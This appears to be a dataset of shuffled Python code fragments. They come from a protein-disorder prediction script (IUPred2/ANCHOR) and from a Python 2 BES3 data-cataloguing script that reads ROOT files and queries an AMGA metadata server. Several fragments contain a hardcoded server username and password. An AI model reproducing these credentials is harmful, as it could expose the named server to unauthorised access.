"to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in",
"energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window),",
"return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line",
"= i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i + 10]",
"_mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if",
"+ 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val",
"mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] *",
"kk += 1 elif end - beg + 1 < 35: k +=",
"if k < nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower()",
"/ len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa",
"0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx]",
"+ 1 if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr)",
"val > 0.3 and not in_gr: beg = idx end = idx in_gr",
"\"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2",
"interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] =",
"interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0]",
"== 'short': for idx in range(len(seq)): for idx2 in range(idx - wc, idx",
"seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0, len(res), 10)])",
"beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res",
"h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx",
"len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at",
"found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1]",
"identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv:",
"1: end}) in_gr = False elif in_gr: end += 1 if val >",
"PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found",
"gr.append({0: beg, 1: end}) mgr = [] k = 0 kk = k",
"= [] in_gr = False beg, end = 0, 0 for idx, val",
"= _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file,",
"1].upper() nr = i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i",
"'glob': lc = 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH))",
"res += seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0,"
] |
[
"os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst,",
"',' items=runIds.split(',') #members' style in items is string,we need to change their style",
"resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if",
"lfn = filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format =",
"ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get",
"string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in",
"jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check",
"eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"]",
"checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat)",
"getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance of this",
"to resList if result[4] not in resList: resList.append(result[4]) #only including one resonance if",
"str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check",
"has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile",
"to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile)",
"empty, please run createBesDir first\" return Flase for item in entries: #for each",
"= max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]:",
"commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile",
"file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");')",
"file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId",
"splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"] == runId:",
"return result #get Boss version, runid, Entry number, JobOptions from root file def",
"%s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error",
"is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for",
"runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is",
"gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new",
"gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);')",
"attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get",
"is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values are",
"including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0]",
"entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] #",
"expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to resList",
"format def __str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat",
"calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename",
"get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error",
"attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile",
"filename also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"])",
"= mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry",
"result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all",
"self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes =",
"= 1 return flag #Before reading information from .root file,we need to use",
"reading information from .root file,we need to use changeFormat #function to create a",
"del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name",
"in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to",
"= getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling getLFN",
"class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store",
"is null #null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"]",
"entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo())",
"import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end)",
"behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res",
"def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if format",
"result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList",
"#set values of attribute status,streamId,Description #and these values are null #-1 <=> value",
"in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType",
"RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of",
"= list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is string,we",
"attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return",
"abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for",
"of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId",
"DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time() obj =",
"attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds)",
"raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this",
"if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items)",
"run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile",
"from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not",
"and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print",
"getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes =",
"\"ExpSearch directory is empty, please run createBesDir first\" return Flase for item in",
"#-1 <=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del",
"streamId is null #null <=> value of Description is null attributes[\"status\"] = -1",
"lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile)",
"\"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1]",
"= mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry",
"{} expRes = {} lfnInfo = {} runIds = [] #change the .dst",
"Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile",
"len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something",
"#get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if",
"run createBesDir first\" return Flase for item in entries: #for each entry,get its",
"these values are null #-1 <=> value of status is null #-1 <=>",
"list = pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds",
"according ',' items=runIds.split(',') #members' style in items is string,we need to change their",
"def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\": if",
"%s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL =",
"expRes[\"expNum\"] = str return expRes #check whether eventType is stored in eventTypeList in",
"entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0]",
"naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from",
"= str return expRes #check whether eventType is stored in eventTypeList in amga",
"i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object):",
"#-1 <=> value of status is null #-1 <=> value of streamId is",
"os import os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface",
"\"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not",
"attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored",
"name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file",
"= -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time()",
"list is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds",
"from .root file,we need to use changeFormat #function to create a .root link",
"= lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"])",
"= [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while",
"is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType",
"#under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum",
"is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions",
"eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry =",
"attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling",
"streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"])",
"%d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them from JobOptions",
"function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile)",
"by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get",
"not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it",
"{} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if",
"file print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList) ==",
"len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum",
"resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else:",
"\"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of",
"data/skim & mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst",
"getAttributes(self): #store all attributes attributes = {} expRes = {} runIds = []",
"while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of",
"like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT from",
"expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]:",
"#null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0'",
"checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if format of",
"== 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into",
"several runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if",
"= runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\"",
"function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile)",
"attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result",
"srcformat: #if format of file is in srcformat if file.endswith(format): flag = 1",
"rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT",
"else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by",
"JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH",
"#get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes ==",
"def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None:",
"lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"]",
"[] expRes = {} expNumList = [] resList = [] #print\"runids\",runids client =",
"entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of each entry",
"if file.endswith(format): flag = 1 return flag #Before reading information from .root file,we",
"= resList[0] else: #has several resonances,may be has something wrong to this file",
"like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2)",
"= attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes",
"client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch",
"ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in",
"please run createBesDir first\" return Flase for item in entries: #for each entry,get",
"runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in",
"something wrong to this file print \"serveral resonance:\",resList return False #only including one",
"else: print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return",
"\"null\" #if resonance in filename is same as resonance that get from ExpSearch",
"#and these values are null #-1 <=> value of status is null #-1",
"expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False:",
"calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum",
"between runfrm and runto,and expNum isn't in expNumList #add this expNum to expNumList",
"expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] =",
"runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file",
".root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"]",
"# print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for",
"resonance:\",resList return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] =",
"None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat =",
"Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"]",
"values of attribute status,streamId,Description #and these values are null #-1 <=> value of",
"is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]:",
"gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss",
"= expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance",
"tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();')",
"else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\"",
"expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print",
"mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry =",
"result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not",
"= getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"])",
"\"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return",
"#if format of file is in srcformat if file.endswith(format): flag = 1 return",
"== runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds)",
"attribute status,streamId,Description #and these values are null #-1 <=> value of status is",
"class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store",
"max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"]",
"JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo",
"for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class",
"print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set",
"runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else:",
"runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"]",
"name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class",
"getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then",
"rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo",
"format.search(expNum) if res is not None: return res.group() #Get expNum and resonance from",
"runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by",
"return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if",
"= getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"]",
"style in items is string,we need to change their style to integer for",
"if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like",
"else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\"",
"eventType with name of each entry if eventType == result[0]: return True return",
"new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import",
"mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os",
"= splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"] ==",
"lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch",
"client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result =",
"#get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] =",
"items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"]",
"branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader =",
"of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise",
"=(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new",
"also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"]",
"#Before reading information from .root file,we need to use changeFormat #function to create",
"runL is equal to runH,this file only has one runId if lfnInfo[\"runL\"] ==",
"is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL",
"in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute",
"version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {}",
"if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] =",
"all runid whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\"",
"srcformat if file.endswith(format): flag = 1 return flag #Before reading information from .root",
"runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\":",
"function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling",
"Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries",
"attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is",
"#only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if",
"attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes()",
"if entries is None: print \"ExpSearch directory is empty, please run createBesDir first\"",
"#get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL",
"None: print \"ExpSearch directory is empty, please run createBesDir first\" return Flase for",
"change their style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid)",
"function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has",
"linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we",
"runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in expNumList #add",
